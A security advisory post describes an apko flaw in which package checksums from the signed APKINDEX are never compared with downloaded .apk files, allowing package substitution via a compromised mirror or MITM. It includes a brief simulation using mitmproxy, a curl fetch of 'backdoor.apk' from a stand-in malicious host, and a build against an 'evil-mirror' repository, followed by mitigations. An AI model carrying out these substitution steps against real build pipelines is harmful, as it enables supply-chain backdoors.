Listen to this Post
The vulnerability arises because `apko` fetches a signed `APKINDEX.tar.gz` which contains expected checksums for each package, but never actually compares those checksums against the downloaded `.apk` files. The code parses the index, retrieves the ChecksumString(), computes the control hash of the downloaded package, and then silently discards both values without any comparison inside getPackageImpl(). This allows an attacker who controls the download response (via a compromised mirror, HTTP repository, or poisoned CDN cache) to substitute any arbitrary `.apk` package, which `apko` will accept and embed into the final container image. The signature on the index is still verified, but that only ensures the index itself hasn’t been tampered with—not that the actual packages match the index. As a result, a malicious actor can inject backdoored software into images built with `apko` without triggering any error or warning.
DailyCVE Form
Platform: apko Version: <1.2.7 Vulnerability: Checksum validation bypass Severity: High date: 2026-04-23 Prediction: 2026-05-18
Analytics under What Undercode Say:
Check if your apko version is vulnerable apko version Simulate a malicious mirror that substitutes a package sudo mitmproxy --mode transparent --set block_global=false & Replace the legitimate APK download with a malicious one curl -o malicious.apk http://malicious-site/backdoor.apk Run apko build with HTTP repository apko build config.yaml output.tar --repository-uri http://evil-mirror.local/alpine Inspect the resulting image for the tampered package docker run --rm output.tar apk info -v
Exploit:
An attacker with Man-in-the-Middle (MITM) capabilities on the network path between `apko` and the APK repository can intercept each `.apk` download request and respond with a different package than the one requested. Because `apko` does not enforce the checksum from APKINDEX.tar.gz, the substituted package is accepted without any warning, and the final container image is built containing the attacker-controlled payload.
Protection from this CVE
- Upgrade to `apko` version 1.2.7 or later as soon as it becomes available.
- Use only HTTPS repository URLs to encrypt connections and prevent MITM attacks.
- Employ a private, trusted APK mirror with pinned TLS certificates.
- Manually verify the integrity of critical packages after each build using external tools (e.g.,
sha256sum).
Impact:
Arbitrary code execution in the resulting container image; full supply chain compromise of any image built with the vulnerable `apko` version, allowing an attacker to implant backdoors, steal credentials, or pivot to production environments.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
